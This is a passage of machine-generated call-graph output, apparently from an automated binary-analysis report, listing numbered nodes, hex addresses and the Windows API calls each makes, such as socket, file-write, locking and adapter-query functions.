16a29ee 20606->20620 20609 16a3659 20607->20609 20611 16b0b10 Mailbox 68 API calls 20609->20611 20610->19769 20611->20610 20613 16b0b10 Mailbox 68 API calls 20612->20613 20614 16a2f0a WSAGetLastError 20613->20614 20615 16a2f41 20614->20615 20616 16a2f21 20614->20616 20615->20597 20615->20610 20617 16a2f3c 20616->20617 20618 16a2f27 setsockopt 20616->20618 20619 16b0b10 Mailbox 68 API calls 20617->20619 20618->20617 20619->20615 20621 16a2a0c 20620->20621 20636 16a2aad 20620->20636 20623 16a2a39 WSASetLastError closesocket 20621->20623 20627 16b0b10 Mailbox 68 API calls 20621->20627 20622 16b0b10 Mailbox 68 API calls 20624 16a2ab8 20622->20624 20625 16aa509 69 API calls 20623->20625 20624->20610 20626 16a2a51 20625->20626 20630 16b0b10 Mailbox 68 API calls 20626->20630 20626->20636 20628 16a2a21 20627->20628 20638 16a2f50 20628->20638 20632 16a2a5c 20630->20632 20633 16a2a7b ioctlsocket WSASetLastError closesocket 20632->20633 20634 16b0b10 Mailbox 68 API calls 20632->20634 20635 16aa509 69 API calls 20633->20635 20637 16a2a6e 20634->20637 20635->20636 20636->20622 20636->20624 20637->20633 20637->20636 20639 16a2f5b 20638->20639 20640 16a2f70 WSASetLastError setsockopt 20638->20640 20641 16b0b10 Mailbox 68 API calls 20639->20641 20642 16aa509 69 API calls 20640->20642 20645 16a2a36 20641->20645 20643 16a2f9e 20642->20643 20644 16b0b10 Mailbox 68 API calls 20643->20644 20643->20645 20644->20645 20645->20623 20647 16a303b 20646->20647 20648 16a304d WSASetLastError select 20646->20648 20650 16b0b10 Mailbox 68 API calls 20647->20650 20649 16aa509 69 API calls 20648->20649 20651 16a3095 20649->20651 20653 16a2b59 20650->20653 20652 16b0b10 Mailbox 68 API calls 20651->20652 20651->20653 20652->20653 20653->20589 20654 16a2fb4 20653->20654 20655 16a2fc0 20654->20655 20656 16a2fd5 WSASetLastError getsockopt 20654->20656 20658 16b0b10 Mailbox 68 API calls 20655->20658 20657 16aa509 69 API calls 20656->20657 20659 16a300f 20657->20659 20661 16a2b7a 20658->20661 20660 16b0b10 Mailbox 68 API calls 20659->20660 20659->20661 20660->20661 20661->20588 20661->20589 20669 16c53f0 20662->20669 20664 16a32b5 RtlEnterCriticalSection 20665 16b0b10 Mailbox 68 API calls 20664->20665 20666 16a32d6 20665->20666 20670 16a3307 20666->20670 20669->20664 20672 16a3311 __EH_prolog 20670->20672 20673 16a3350 20672->20673 20682 16a7e82 20672->20682 20686 16a239d 20673->20686 20676 16a3390 20692 16a7e2b 20676->20692 20677 16b0b10 Mailbox 68 API calls 20680 16a337c 20677->20680 20681 16a2d39 71 API calls 20680->20681 20681->20676 20683 16a7e90 20682->20683 20685 16a7f06 20683->20685 20696 16a89e7 20683->20696 20685->20672 20689 16a23ab 20686->20689 20687 16a2417 20687->20676 20687->20677 20688 16a23c1 PostQueuedCompletionStatus 20688->20689 20690 16a23da RtlEnterCriticalSection 20688->20690 20689->20687 20689->20688 20691 16a23f8 InterlockedExchange RtlLeaveCriticalSection 20689->20691 20690->20689 20691->20689 20694 16a7e30 20692->20694 20693 16a32ee RtlLeaveCriticalSection 20693->19788 20694->20693 20712 16a1e7f 20694->20712 20697 16a8a11 20696->20697 20698 16a7e2b 68 API calls 20697->20698 20700 16a8a57 20698->20700 20699 16a8a7e 20699->20685 20700->20699 20702 16aa274 20700->20702 20703 16aa28e 20702->20703 20704 16aa27e 20702->20704 20703->20699 20704->20703 20707 16afb32 20704->20707 20708 16b24d3 std::exception::exception 59 API calls 20707->20708 20709 16afb4a 20708->20709 20710 16b455a __CxxThrowException@8 RaiseException 20709->20710 20711 16afb5f 20710->20711 20713 16b0b10 Mailbox 68 API calls 20712->20713 20714 16a1e90 20713->20714 20714->20694 20716 16b227b _LocaleUpdate::_LocaleUpdate 59 API calls 20715->20716 20717 16b2397 20716->20717 20718 16b23a5 20717->20718 20724 16b23bc 20717->20724 20719 16b5e5b __setmbcp 59 API calls 20718->20719 20720 16b23aa 20719->20720 20721 16b4ef5 __gmtime64_s 9 API calls 20720->20721 20723 16b23b5 ___ascii_stricmp 20721->20723 20722 16b597a 66 API calls __tolower_l 20722->20724 20723->19799 20724->20722 20724->20723 20726 16b288b 20725->20726 20727 16b5e5b __setmbcp 59 API calls 20726->20727 20730 16b289b _strlen 20726->20730 20728 16b2890 20727->20728 20729 16b4ef5 __gmtime64_s 9 API calls 20728->20729 20729->20730 20730->19806 20732 16ae00a __EH_prolog 20731->20732 20733 16b3b4c _Allocate 60 API calls 20732->20733 20734 16ae021 20733->20734 20734->19817 20736 16aa712 GetProcessHeap HeapFree 20735->20736 20736->19823 20738 16b227b _LocaleUpdate::_LocaleUpdate 59 API calls 20737->20738 20739 16b60c5 20738->20739 20740 16b5e5b __setmbcp 59 API calls 20739->20740 20741 16b60ca 20740->20741 20742 16b6b9b 20741->20742 20754 16b60ea __output_l __aulldvrm _strlen 20741->20754 20782 16b9e31 20741->20782 20743 16b5e5b __setmbcp 59 API calls 20742->20743 20744 16b6ba0 20743->20744 20746 16b4ef5 __gmtime64_s 9 API calls 20744->20746 20747 16b6b75 20746->20747 20748 16b454b __output_l 6 API calls 20747->20748 20749 16b2476 20748->20749 20749->19835 20761 16b5f01 20749->20761 20751 16b6bd0 79 API calls __output_l 20751->20754 20752 16b6753 RtlDecodePointer 20752->20754 20753 16b2f74 _free 59 API calls 20753->20754 20754->20742 20754->20747 20754->20751 20754->20752 20754->20753 20755 16b8ab5 __malloc_crt 59 API calls 20754->20755 20756 16b67b6 RtlDecodePointer 20754->20756 20757 16b67db RtlDecodePointer 20754->20757 20758 16b6c44 79 API calls _write_string 20754->20758 20759 16bfae4 61 API calls __cftof 20754->20759 20760 16b6c18 79 API calls _write_multi_char 20754->20760 20789 16bdd0e 20754->20789 20755->20754 20756->20754 20757->20754 20758->20754 20759->20754 20760->20754 20762 16b9e31 __output_l 59 API calls 20761->20762 20763 16b5f0f 20762->20763 20764 16b5f1a 20763->20764 20765 16b5f31 20763->20765 20766 16b5e5b __setmbcp 59 API calls 20764->20766 20767 16b5f36 20765->20767 20776 16b5f43 __flsbuf 20765->20776 20775 16b5f1f 20766->20775 20768 16b5e5b __setmbcp 59 API calls 20767->20768 20768->20775 20769 16b5f9d 20770 16b6021 20769->20770 20771 16b5fa7 20769->20771 20772 16b9e55 __write 79 API calls 20770->20772 20773 16b5fc1 20771->20773 20778 16b5fd8 20771->20778 20772->20775 20804 16b9e55 20773->20804 20775->19835 20776->20769 20776->20775 20779 16b5f92 20776->20779 20792 16bf7a2 20776->20792 20778->20775 20832 16bf7f6 20778->20832 20779->20769 20801 16bf965 20779->20801 20783 16b9e3b 20782->20783 20784 16b9e50 20782->20784 20785 16b5e5b __setmbcp 59 API calls 20783->20785 20784->20754 20786 16b9e40 20785->20786 20787 16b4ef5 __gmtime64_s 9 API calls 20786->20787 20788 16b9e4b 20787->20788 20788->20754 20790 16b227b _LocaleUpdate::_LocaleUpdate 59 API calls 20789->20790 20791 16bdd1f 20790->20791 20791->20754 20793 16bf7ba 20792->20793 20794 16bf7ad 20792->20794 20796 16bf7c6 20793->20796 20797 16b5e5b __setmbcp 59 API calls 20793->20797 20795 16b5e5b __setmbcp 59 API calls 20794->20795 20798 16bf7b2 20795->20798 20796->20779 20799 16bf7e7 20797->20799 20798->20779 20800 16b4ef5 __gmtime64_s 9 API calls 20799->20800 20800->20798 20802 16b8ab5 __malloc_crt 59 API calls 20801->20802 20803 16bf97a 20802->20803 20803->20769 20805 16b9e61 ___lock_fhandle 20804->20805 20806 16b9e6e 20805->20806 20807 16b9e85 20805->20807 20809 16b5e27 __lseeki64 59 API calls 20806->20809 20808 16b9f24 20807->20808 20811 16b9e99 20807->20811 20812 16b5e27 __lseeki64 59 API calls 20808->20812 20810 16b9e73 20809->20810 20813 16b5e5b __setmbcp 59 API calls 20810->20813 20814 16b9ec1 20811->20814 20815 16b9eb7 20811->20815 20816 16b9ebc 20812->20816 20825 16b9e7a ___lock_fhandle 20813->20825 20857 16c0c87 20814->20857 20817 16b5e27 __lseeki64 59 API calls 20815->20817 20820 16b5e5b __setmbcp 59 API calls 20816->20820 20817->20816 20819 16b9ec7 20821 16b9eda 20819->20821 20822 16b9eed 20819->20822 20823 16b9f30 20820->20823 20866 16b9f44 20821->20866 20824 16b5e5b __setmbcp 59 API calls 20822->20824 20827 16b4ef5 __gmtime64_s 9 API calls 20823->20827 20828 16b9ef2 20824->20828 20825->20775 20827->20825 20830 16b5e27 __lseeki64 59 API calls 20828->20830 20829 16b9ee6 20925 16b9f1c 20829->20925 20830->20829 20833 16bf802 ___lock_fhandle 20832->20833 20834 16bf82b 20833->20834 20835 16bf813 20833->20835 20836 16bf8d0 20834->20836 20841 16bf860 20834->20841 20837 16b5e27 __lseeki64 59 API calls 20835->20837 20839 16b5e27 __lseeki64 59 API calls 20836->20839 20838 16bf818 20837->20838 20840 16b5e5b __setmbcp 59 API calls 20838->20840 20842 16bf8d5 20839->20842 20843 16bf820 ___lock_fhandle 20840->20843 20844 16c0c87 ___lock_fhandle 60 API calls 20841->20844 20845 16b5e5b __setmbcp 59 API calls 20842->20845 20843->20775 20846 16bf866 20844->20846 20847 16bf8dd 20845->20847 20848 16bf87c 20846->20848 20849 16bf894 20846->20849 20850 16b4ef5 __gmtime64_s 9 API calls 20847->20850 20851 16bf8f2 __lseeki64_nolock 61 API calls 20848->20851 20852 16b5e5b __setmbcp 59 API calls 20849->20852 20850->20843 20854 16bf88b 20851->20854 20853 16bf899 20852->20853 20855 16b5e27 __lseeki64 59 API calls 20853->20855 20958 16bf8c8 20854->20958 20855->20854 20858 16c0c93 ___lock_fhandle 20857->20858 20859 16c0ce2 RtlEnterCriticalSection 20858->20859 20860 16b88ee __lock 59 API calls 20858->20860 20861 16c0d08 ___lock_fhandle 20859->20861 20862 16c0cb8 20860->20862 20861->20819 20863 16c0cd0 20862->20863 20864 16b920c ___lock_fhandle InitializeCriticalSectionAndSpinCount 20862->20864 20928 16c0d0c 20863->20928 20864->20863 20867 16b9f51 __write_nolock 20866->20867 20868 16b9faf 20867->20868 20869 16b9f90 20867->20869 20899 16b9f85 20867->20899 20872 16ba007 20868->20872 20873 16b9feb 20868->20873 20871 16b5e27 __lseeki64 59 API calls 20869->20871 20870 16b454b __output_l 6 API calls 20874 16ba7a5 20870->20874 20875 16b9f95 20871->20875 20877 16ba020 20872->20877 20932 16bf8f2 20872->20932 20876 16b5e27 __lseeki64 59 API calls 20873->20876 20874->20829 20878 16b5e5b __setmbcp 59 API calls 20875->20878 20880 16b9ff0 20876->20880 20879 16bf7a2 __flsbuf 59 API calls 20877->20879 20882 16b9f9c 20878->20882 20884 16ba02e 20879->20884 20885 16b5e5b __setmbcp 59 API calls 20880->20885 20883 16b4ef5 __gmtime64_s 9 API calls 20882->20883 20883->20899 20886 16ba387 20884->20886 20891 16b5c5a __setmbcp 59 API calls 20884->20891 20887 16b9ff7 20885->20887 20888 16ba71a WriteFile 20886->20888 20889 16ba3a5 20886->20889 20890 16b4ef5 __gmtime64_s 9 API calls 20887->20890 20892 16ba37a GetLastError 20888->20892 20898 16ba347 20888->20898 20893 16ba4c9 20889->20893 20902 16ba3bb 20889->20902 20890->20899 20894 16ba05a GetConsoleMode 20891->20894 20892->20898 20905 16ba4d4 20893->20905 20916 16ba5be 20893->20916 20894->20886 20896 16ba099 20894->20896 20895 16ba753 20897 16b5e5b __setmbcp 59 API calls 20895->20897 20895->20899 20896->20886 20900 16ba0a9 GetConsoleCP 20896->20900 20903 16ba781 20897->20903 20898->20895 20898->20899 20904 16ba4a7 20898->20904 20899->20870 20900->20895 20923 16ba0d8 20900->20923 20901 16ba42a WriteFile 20901->20892 20901->20902 20902->20895 20902->20898 20902->20901 20907 16b5e27 __lseeki64 59 API calls 20903->20907 20908 16ba74a 20904->20908 20909 16ba4b2 20904->20909 20905->20895 20905->20898 20906 16ba539 WriteFile 20905->20906 20906->20892 20906->20905 20907->20899 20912 16b5e3a __dosmaperr 59 API calls 20908->20912 20911 16b5e5b __setmbcp 59 API calls 20909->20911 20910 16ba633 WideCharToMultiByte 20910->20892 20910->20916 20914 16ba4b7 20911->20914 20912->20899 20913 16ba682 WriteFile 20913->20916 20917 16ba6d5 GetLastError 20913->20917 20916->20895 20916->20898 20916->20910 20916->20913 20917->20916 20919 16c1053 WriteConsoleW CreateFileW __putwch_nolock 20919->20923 20920 16c000a 61 API calls __write_nolock 20920->20923 20921 16ba1c1 WideCharToMultiByte 20921->20898 20923->20892 20923->20898 20923->20919 20923->20920 20923->20921 20924 16ba256 WriteFile 20923->20924 20941 16bdd48 20923->20941 20924->20892 20924->20923 20957 16c102d RtlLeaveCriticalSection 20925->20957 20927 16b9f22 20927->20825 20931 16b8a58 RtlLeaveCriticalSection 20928->20931 20930 16c0d13 20930->20859 20931->20930 20944 16c0f44 20932->20944 20934 16bf902 20935 16bf91b SetFilePointerEx 20934->20935 20936 16bf90a 20934->20936 20938 16bf933 GetLastError 20935->20938 20939 16bf90f 20935->20939 20937 16b5e5b __setmbcp 59 API calls 20936->20937 20937->20939 20940 16b5e3a __dosmaperr 59 API calls 20938->20940 20939->20877 20940->20939 20942 16bdd0e __isleadbyte_l 59 API calls 20941->20942 20945 16c0f4f 20944->20945 20946 16c0f64 20944->20946 20947 16b5e27 __lseeki64 59 API calls 20945->20947 20948 16b5e27 __lseeki64 59 API calls 20946->20948 20950 16c0f89 20946->20950 20949 16c0f54 20947->20949 20951 16c0f93 20948->20951 20952 16b5e5b __setmbcp 59 API calls 20949->20952 20950->20934 20953 16b5e5b __setmbcp 59 API calls 20951->20953 20954 16c0f5c 20952->20954 20955 16c0f9b 20953->20955 20954->20934 20956 16b4ef5 __gmtime64_s 9 API calls 20955->20956 20956->20954 20957->20927 20961 16c102d RtlLeaveCriticalSection 20958->20961 20960 16bf8ce 20960->20843 20961->20960 20962->19839 20964 16ae33a __EH_prolog 20963->20964 20965 16b3b4c _Allocate 60 API calls 20964->20965 20967 16ae343 20965->20967 20966 16a1bfa RtlEnterCriticalSection 20966->19844 20967->20966 20969 16ae551 20967->20969 20970 16ae55b __EH_prolog 20969->20970 20973 16a26db RtlEnterCriticalSection 20970->20973 20972 16ae5b1 20972->20966 20974 16a2728 CreateWaitableTimerA 20973->20974 20975 16a277e 20973->20975 20976 16a275b SetWaitableTimer 20974->20976 20977 16a2738 GetLastError 20974->20977 20978 16a27d5 RtlLeaveCriticalSection 20975->20978 20980 16b3b4c _Allocate 60 API calls 20975->20980 20976->20975 20979 16b0b10 Mailbox 68 API calls 20977->20979 20978->20972 20981 16a2745 20979->20981 20982 16a278a 20980->20982 20983 16a1712 60 API calls 20981->20983 20984 16a27c8 20982->20984 20985 16b3b4c _Allocate 60 API calls 20982->20985 20983->20976 21017 16a7e03 20984->21017 20987 16a27a9 20985->20987 20989 16a1cf8 CreateEventA 20987->20989 20990 16a1d52 CreateEventA 20989->20990 20991 16a1d23 GetLastError 20989->20991 20992 16a1d96 20990->20992 20993 16a1d6b GetLastError 20990->20993 20995 16a1d33 20991->20995 20994 16b33b9 __beginthreadex 275 API calls 20992->20994 20996 16a1d7b 20993->20996 20997 16a1db6 20994->20997 20998 16b0b10 Mailbox 68 API calls 20995->20998 21000 16b0b10 Mailbox 68 API calls 20996->21000 21001 16a1e0d 20997->21001 21002 16a1dc6 GetLastError 20997->21002 20999 16a1d3c 20998->20999 21003 16a1712 60 API calls 20999->21003 21004 16a1d84 21000->21004 21005 16a1e1d 21001->21005 21006 16a1e11 WaitForSingleObject FindCloseChangeNotification 21001->21006 21007 16a1dd8 21002->21007 21008 16a1d4e 21003->21008 21009 16a1712 60 API calls 21004->21009 21005->20984 21006->21005 21010 16a1ddf 21007->21010 21011 16a1ddc CloseHandle 21007->21011 21008->20990 21009->20992 21012 16a1de9 CloseHandle 21010->21012 21013 16a1dee 21010->21013 21011->21010 21012->21013 21014 16b0b10 Mailbox 68 API calls 21013->21014 21015 16a1dfb 21014->21015 21016 16a1712 60 API calls 21015->21016 21016->21001 21018 16a7e1f 21017->21018 21019 16a7e10 CloseHandle 21017->21019 21018->20978 21019->21018 21031 16a30ae WSASetLastError 21020->21031 21022 16a3c90 21025 16a16ae 21022->21025 21024 16a30ae 71 API calls 21024->21022 21026 16a16b8 __EH_prolog 21025->21026 21027 16a1701 21026->21027 21028 16b24d3 std::exception::exception 59 API calls 21026->21028 21027->19721 21029 16a16dc 21028->21029 21047 16aa4a2 21029->21047 21032 16a30ce 21031->21032 21033 16a30ec WSAStringToAddressA 21031->21033 21032->21033 21035 16a30d3 21032->21035 21034 16aa509 69 API calls 21033->21034 21037 16a3114 21034->21037 21036 16b0b10 Mailbox 68 API calls 21035->21036 21046 16a30d8 21036->21046 21038 16a3154 21037->21038 21044 16a311e _memcmp 21037->21044 21039 16a3135 21038->21039 21041 16b0b10 Mailbox 68 API calls 21038->21041 21040 16a3193 21039->21040 21042 16b0b10 Mailbox 68 API calls 21039->21042 21045 16b0b10 Mailbox 68 API calls 21040->21045 21040->21046 21041->21039 21042->21040 21043 16b0b10 Mailbox 68 API calls 21043->21039 21044->21039 21044->21043 21045->21046 21046->21022 21046->21024 21048 16aa4ac __EH_prolog 21047->21048 21055 16aca07 21048->21055 21052 16aa4cd 21053 16b455a __CxxThrowException@8 RaiseException 21052->21053 21054 16aa4db 21053->21054 21056 16ab22e std::bad_exception::bad_exception 60 API calls 21055->21056 21057 16aa4bf 21056->21057 21058 16aca43 21057->21058 21059 16aca4d __EH_prolog 21058->21059 21062 16ab1dd 21059->21062 21061 16aca7c Mailbox 21061->21052 21063 16ab1e7 __EH_prolog 21062->21063 21064 16ab22e std::bad_exception::bad_exception 60 API calls 21063->21064 21065 16ab1f8 Mailbox 21064->21065 21065->21061 21067 16a3c20 __EH_prolog 21066->21067 21068 16a3c41 21067->21068 21069 16b24b7 std::bad_exception::bad_exception 59 API calls 21067->21069 21068->19859 21070 16a3c35 21069->21070 21071 16aa657 60 API calls 21070->21071 21071->21068 21073 16a3770 21072->21073 21074 16a3755 InterlockedCompareExchange 21072->21074 21076 16b0b10 Mailbox 68 API calls 21073->21076 21074->21073 21075 16a3765 21074->21075 21077 16a32ab 78 API calls 21075->21077 21078 16a3779 21076->21078 21077->21073 21079 16a29ee 76 API calls 21078->21079 21080 16a378e 21079->21080 21080->19863 21110 16b36ad 21081->21110 21083 16a53c8 21083->19873 21084 16b3906 21083->21084 21085 16b3912 ___lock_fhandle 21084->21085 21086 16b3940 ___lock_fhandle 21085->21086 21087 16b3948 21085->21087 21088 16b3930 21085->21088 21086->19875 21252 16b97f2 21087->21252 21089 16b5e5b __setmbcp 59 API calls 21088->21089 21091 16b3935 21089->21091 21093 16b4ef5 __gmtime64_s 9 API calls 21091->21093 21093->21086 21098 16b3a90 ___lock_fhandle 21097->21098 21099 16b3abc 21098->21099 21100 16b3aa4 21098->21100 21102 16b97f2 __lock_file 60 API calls 21099->21102 21107 16b3ab4 ___lock_fhandle 21099->21107 21101 16b5e5b __setmbcp 59 API calls 21100->21101 21103 16b3aa9 21101->21103 21104 16b3ace 21102->21104 21105 16b4ef5 __gmtime64_s 9 API calls 21103->21105 21279 16b3a18 21104->21279 21105->21107 21107->19873 21113 16b36b9 ___lock_fhandle 21110->21113 21111 16b36cb 21112 16b5e5b __setmbcp 59 API calls 21111->21112 21114 16b36d0 21112->21114 21113->21111 21115 16b36f8 21113->21115 21117 16b4ef5 __gmtime64_s 9 API calls 21114->21117 21129 16b98c8 21115->21129 21124 16b36db ___lock_fhandle @_EH4_CallFilterFunc@8 21117->21124 21118 16b36fd 21119 16b3713 21118->21119 21120 16b3706 21118->21120 21122 16b373c 21119->21122 21123 16b371c 21119->21123 21121 16b5e5b __setmbcp 59 API calls 21120->21121 21121->21124 21144 16b99e7 21122->21144 21125 16b5e5b __setmbcp 59 API calls 21123->21125 21124->21083 21125->21124 21130 16b98d4 ___lock_fhandle 21129->21130 21131 16b88ee __lock 59 API calls 21130->21131 21132 16b98e2 21131->21132 21133 16b995d 21132->21133 21139 16b8976 __mtinitlocknum 59 API calls 21132->21139 21142 16b9956 21132->21142 21164 16b9831 21132->21164 21169 16b989b 21132->21169 21134 16b8ab5 __malloc_crt 59 API calls 21133->21134 21136 16b9964 21134->21136 21138 16b920c ___lock_fhandle InitializeCriticalSectionAndSpinCount 21136->21138 21136->21142 21137 16b99d3 ___lock_fhandle 21137->21118 21141 16b998a RtlEnterCriticalSection 21138->21141 21139->21132 21141->21142 21174 16b99de 21142->21174 21154 16b9a04 21144->21154 21145 16b9a18 21146 16b5e5b __setmbcp 59 API calls 21145->21146 21148 16b9a1d 21146->21148 21147 16b9bbf 21147->21145 21150 16b9c1b 21147->21150 21149 16b4ef5 __gmtime64_s 9 API calls 21148->21149 21151 16b3747 21149->21151 21185 16c0830 21150->21185 21161 16b3769 21151->21161 21154->21145 21154->21147 21179 16c084e 21154->21179 21158 16c097d __openfile 59 API calls 21159 16b9bd7 21158->21159 21159->21147 21160 16c097d __openfile 59 API calls 21159->21160 21160->21147 21245 16b9861 21161->21245 21163 16b376f 21163->21124 21165 16b983c 21164->21165 21166 16b9852 RtlEnterCriticalSection 21164->21166 21167 16b88ee __lock 59 API calls 21165->21167 21166->21132 21168 16b9845 21167->21168 21168->21132 21170 16b98a9 21169->21170 21171 16b98bc RtlLeaveCriticalSection 21169->21171 21177 16b8a58 RtlLeaveCriticalSection 21170->21177 21171->21132 21173 16b98b9 21173->21132 21178 16b8a58 RtlLeaveCriticalSection 21174->21178 21176 16b99e5 21176->21137 21177->21173 21178->21176 21188 16c0866 21179->21188 21181 16b9b85 21181->21145 21182 16c097d 21181->21182 21196 16c0995 21182->21196 21184 16b9bb8 21184->21147 21184->21158 21203 16c0719 21185->21203 21187 16c0849 21187->21151 21189 16c087b 21188->21189 21195 16c0874 21188->21195 21190 16b227b _LocaleUpdate::_LocaleUpdate 59 API calls 21189->21190 21191 16c0888 21190->21191 21192 16b5e5b __setmbcp 59 API calls 21191->21192 21191->21195 21193 16c08bb 21192->21193 21194 16b4ef5 __gmtime64_s 9 API calls 21193->21194 21194->21195 21195->21181 21197 16b227b _LocaleUpdate::_LocaleUpdate 59 API calls 21196->21197 21198 16c09a8 21197->21198 21199 16b5e5b __setmbcp 59 API calls 21198->21199 21202 16c09bd 21198->21202 21200 16c09e9 21199->21200 21201 16b4ef5 __gmtime64_s 9 API calls 21200->21201 21201->21202 21202->21184 21204 16c0725 ___lock_fhandle 21203->21204 21205 16c073b 21204->21205 21208 16c0771 21204->21208 21206 16b5e5b __setmbcp 59 API calls 21205->21206 21207 16c0740 21206->21207 21210 16b4ef5 __gmtime64_s 9 API calls 21207->21210 21214 16c07e2 21208->21214 21213 16c074a ___lock_fhandle 21210->21213 21213->21187 21223 16b8237 21214->21223 21216 16c07f6 21217 16c078d 21216->21217 21218 16b2f74 _free 59 API calls 21216->21218 21219 16c07b6 21217->21219 21218->21217 21220 16c07e0 21219->21220 21221 16c07bc 21219->21221 21220->21213 21244 16c102d RtlLeaveCriticalSection 21221->21244 21224 16b825a 21223->21224 21225 16b8244 21223->21225 21224->21225 21227 16b8261 ___crtIsPackagedApp 21224->21227 21226 16b5e5b __setmbcp 59 API calls 21225->21226 21228 16b8249 21226->21228 21230 16b826a AreFileApisANSI 21227->21230 21231 16b8277 MultiByteToWideChar 21227->21231 21229 16b4ef5 __gmtime64_s 9 API calls 21228->21229 21243 16b8253 21229->21243 21230->21231 21232 16b8274 21230->21232 21233 16b82a2 21231->21233 21234 16b8291 GetLastError 21231->21234 21232->21231 21235 16b8ab5 __malloc_crt 59 API calls 21233->21235 21236 16b5e3a __dosmaperr 59 API calls 21234->21236 21237 16b82aa 21235->21237 21236->21243 21238 16b82b1 MultiByteToWideChar 21237->21238 21237->21243 21239 16b82c7 GetLastError 21238->21239 21238->21243 21240 16b5e3a __dosmaperr 59 API calls 21239->21240 21241 16b82d3 21240->21241 21242 16b2f74 _free 59 API calls 21241->21242 21242->21243 21243->21216 21244->21220 21246 16b988f RtlLeaveCriticalSection 21245->21246 21247 16b9870 21245->21247 21246->21163 21247->21246 21248 16b9877 21247->21248 21251 16b8a58 RtlLeaveCriticalSection 21248->21251 21250 16b988c 21250->21163 21251->21250 21253 16b9802 21252->21253 21254 16b9824 RtlEnterCriticalSection 21252->21254 21253->21254 21255 16b980a 21253->21255 21257 16b394e 21254->21257 21256 16b88ee __lock 59 API calls 21255->21256 21256->21257 21258 16b37ad 21257->21258 21260 16b37bc 21258->21260 21265 16b37da 21258->21265 21259 16b37ca 21261 16b5e5b __setmbcp 59 API calls 21259->21261 21260->21259 21260->21265 21268 16b37f4 _memmove 21260->21268 21262 16b37cf 21261->21262 21263 16b4ef5 __gmtime64_s 9 API calls 21262->21263 21263->21265 21264 16b5f01 __flsbuf 79 API calls 21264->21268 21270 16b3980 21265->21270 21267 16b9e31 __output_l 59 API calls 21267->21268 21268->21264 21268->21265 21268->21267 21269 16b9e55 __write 79 API calls 21268->21269 21273 16ba7ef 21268->21273 21269->21268 21271 16b9861 __fsopen 2 API calls 21270->21271 21272 16b3986 21271->21272 21272->21086 21274 16ba826 21273->21274 21275 16ba802 21273->21275 21274->21268 21275->21274 21276 16b9e31 __output_l 59 API calls 21275->21276 21277 16ba81f 21276->21277 21278 16b9e55 __write 79 API calls 21277->21278 21278->21274 21280 16b3a3b 21279->21280 21281 16b3a27 21279->21281 21283 16b3a37 21280->21283 21285 16ba7ef __flush 79 API calls 21280->21285 21282 16b5e5b __setmbcp 59 API calls 21281->21282 21284 16b3a2c 21282->21284 21295 16b3af3 21283->21295 21286 16b4ef5 __gmtime64_s 9 API calls 21284->21286 21287 16b3a47 21285->21287 21286->21283 21298 16bb29b 21287->21298 21290 16b9e31 __output_l 59 API calls 21291 16b3a55 21290->21291 21302 16bb126 21291->21302 21293 16b3a5b 21293->21283 21294 16b2f74 _free 59 API calls 21293->21294 21294->21283 21296 16b9861 __fsopen 2 API calls 21295->21296 21297 16b3af9 21296->21297 21297->21107 21299 16b3a4f 21298->21299 21300 16bb2a8 21298->21300 21299->21290 21300->21299 21301 16b2f74 _free 59 API calls 21300->21301 21301->21299 21303 16bb132 ___lock_fhandle 21302->21303 21304 16bb13f 21303->21304 21305 16bb156 21303->21305 21306 16b5e27 __lseeki64 59 API calls 21304->21306 21307 16bb1e1 21305->21307 21309 16bb166 21305->21309 21308 16bb144 21306->21308 21310 16b5e27 __lseeki64 59 API calls 21307->21310 21311 16b5e5b __setmbcp 59 API calls 21308->21311 21312 16bb18e 21309->21312 21313 16bb184 21309->21313 21314 16bb189 21310->21314 21316 16bb14b ___lock_fhandle 21311->21316 21315 16c0c87 ___lock_fhandle 60 API calls 21312->21315 21317 16b5e27 __lseeki64 59 API calls 21313->21317 21318 16b5e5b __setmbcp 59 API calls 21314->21318 21319 16bb194 21315->21319 21316->21293 21317->21314 21320 16bb1ed 21318->21320 21321 16bb1b2 21319->21321 21322 16bb1a7 21319->21322 21323 16b4ef5 __gmtime64_s 9 API calls 21320->21323 21325 16b5e5b __setmbcp 59 API calls 21321->21325 21328 16bb201 21322->21328 21323->21316 21326 16bb1ad 21325->21326 21343 16bb1d9 21326->21343 21329 16c0f44 __chsize_nolock 59 API calls 21328->21329 21332 16bb20f 21329->21332 21330 16bb265 21346 16c0ebe 21330->21346 21332->21330 21335 16c0f44 __chsize_nolock 59 API calls 21332->21335 21342 16bb243 21332->21342 21333 16c0f44 __chsize_nolock 59 API calls 21336 16bb24f CloseHandle 21333->21336 21338 16bb23a 21335->21338 21336->21330 21341 16c0f44 __chsize_nolock 59 API calls 21338->21341 21341->21342 21342->21330 21342->21333 21355 16c102d RtlLeaveCriticalSection 21343->21355 21345 16bb1df 21345->21316 21347 16c0f2a 21346->21347 21348 16c0eca 21346->21348 21349 16b5e5b __setmbcp 59 API calls 21347->21349 21348->21347 21352 16c0ef3 21348->21352 21355->21345 21356 16a6487 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 21434 16a42c7 21356->21434 21435 40286f LoadLibraryExA 21436 40d35d 21435->21436 21437 40d250 21438 40d253 GetLocalTime 21437->21438 21442 401f27 21438->21442 21443 401f3c 21442->21443 21446 401a1d 21443->21446 21445 401f45 21447 401a2c 21446->21447 21452 401a4f CreateFileA 21447->21452 21451 401a3e 21451->21445 21453 401a35 21452->21453 21457 401a7d 21452->21457 21460 401b4b LoadLibraryA 21453->21460 21454 401a98 DeviceIoControl 21454->21457 21456 401b3a FindCloseChangeNotification 21456->21453 21457->21454 21457->21456 21458 401b0e GetLastError 21457->21458 21469 402ca6 21457->21469 21472 402c98 21457->21472 21458->21456 21458->21457 21461 401c21 21460->21461 21462 401b6e GetProcAddress 21460->21462 21461->21451 21463 401c18 FreeLibrary 21462->21463 21467 401b85 21462->21467 21463->21461 21464 401b95 GetAdaptersInfo 21464->21467 21465 402ca6 7 API calls 21465->21467 21466 401c15 21466->21463 21467->21464 21467->21465 21467->21466 21468 402c98 12 API calls 21467->21468 21468->21467 21475 4030a1 21469->21475 21505 403001 21472->21505 21476 4030ad 21475->21476 21484 402caf 21475->21484 21477 4030cd 21476->21477 21478 4030b7 21476->21478 21479 4030f8 21477->21479 21483 4030e7 21477->21483 21480 4030f9 HeapFree 21478->21480 21481 4030c3 21478->21481 21479->21480 21480->21484 21486 40443e 21481->21486 21492 404ecf 21483->21492 21484->21457 21487 40447c 21486->21487 21491 404732 21486->21491 21488 404678 VirtualFree 21487->21488 21487->21491 21489 4046dc 21488->21489 21490 4046eb VirtualFree HeapFree 21489->21490 21489->21491 21490->21491 21491->21484 21493 404f12 21492->21493 